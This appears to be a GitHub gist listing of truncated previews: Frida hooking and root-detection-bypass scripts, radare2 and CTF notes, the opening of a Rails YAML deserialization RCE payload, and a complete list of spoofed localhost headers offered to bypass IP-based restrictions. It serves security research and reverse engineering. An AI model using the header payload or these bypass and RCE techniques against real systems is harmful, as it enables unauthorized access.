@eybisi
eybisi / hook_dexloader.js
Last active October 28, 2023 19:16
frida script for hooking loaded classes with the help of dexclassloader init
Java.perform(function(){
    let ThreadDef = Java.use('java.lang.Thread');
    let ThreadObj = ThreadDef.$new();
    // Print the current Java stack so the caller of a loaded class can be identified
    function stackTrace() {
        console.log('------------START STACK---------------');
        let stack = ThreadObj.currentThread().getStackTrace();
        for (let i = 0; i < stack.length; i++) {
            console.log(i + ' => ' + stack[i].toString());
        }
        console.log('------------END STACK---------------');
@yehgdotnet
yehgdotnet / gist:ec6ae948a6735d66f6eaff2ef60649a3
Last active August 24, 2023 17:30
Bypass IP-based restriction through spoofed localhost header
X-Azure-ClientIP: 127.0.0.1
X-Azure-SocketIP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Target-IP: 127.0.0.1
X-Forwarded-Host: localhost
True-Client-IP: 127.0.0.1
@Areizen
Areizen / uninstall.py
Last active July 23, 2020 18:40
Uninstall Device administrator applications
#!/usr/bin/python3
import frida
import subprocess
import sys

if len(sys.argv) != 2:
    print(f"[-] Usage : python3 {sys.argv[0]} <package_to_uninstall>")
    sys.exit(-1)

def message(message, data):
@daniellimws
daniellimws / frida-tips.md
Last active April 5, 2024 21:56
Frida tips

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException
  Java.perform(function() {
    // Root detection bypass example
@niklasb
niklasb / railspwn.rb
Last active March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'

class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end
    class DeprecatedInstanceVariableProxy
@FrankSpierings
FrankSpierings / hookalloverloads.js
Created October 14, 2017 18:57
Hook all overloads - Java/Android - Frida
function getGenericInterceptor(className, func, parameters) {
    // Build one placeholder argument name per parameter of this overload
    // (declared with var so nothing leaks into the global scope)
    var args = [];
    for (var i = 0; i < parameters.length; i++) {
        args.push('arg_' + i);
    }
    // Template for the hook body: call the original, log class.method(args) => result, return result
    var script = "result = this.__FUNCNAME__(__SEPARATED_ARG_NAMES__);\nlogmessage = '__CLASSNAME__.__FUNCNAME__(' + __SEPARATED_ARG_NAMES__ + ') => ' + result;\nconsole.log(logmessage);\nreturn result;";
    script = script.replace(/__FUNCNAME__/g, func);
    script = script.replace(/__SEPARATED_ARG_NAMES__/g, args.join(', '));
    script = script.replace(/__CLASSNAME__/g, className);
@mommi84
mommi84 / awesome-kge.md
Last active March 9, 2024 16:38
Awesome Knowledge Graph Embedding Approaches

Awesome Knowledge Graph Embedding Approaches

This list contains repositories of libraries and approaches for knowledge graph embeddings, which are vector representations of entities and relations in a multi-relational directed labelled graph. Licensed under CC0.

Libraries

@LiveOverflow
LiveOverflow / zwiebel.py
Created October 8, 2016 08:35
TUM CTF 2016
import sys
import r2pipe
r2 = r2pipe.open("./zwiebel2")
r2.cmd("e dbg.profile=zwiebel.rr2")
r2.cmd("doo") # reopen for debugging
r2.cmd("db 0x400875") # set breakpoint at `call r14`
r2.cmd("dc") # continue until breakpoint is hit
def step():
@oleavr
oleavr / load-cycript.js
Last active February 18, 2019 13:15
Frida script to load Cycript into an arbitrary process (workaround for sandboxing issues)
'use strict';

/*
 * Usage:
 * $ frida -U -n Twitter -l load-cycript.js
 */

var PORT = 27060;

dlopen('/usr/lib/libcycript.dylib');

radare2

  • load without any analysis (file header at offset 0x0): r2 -n /path/to/file
  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main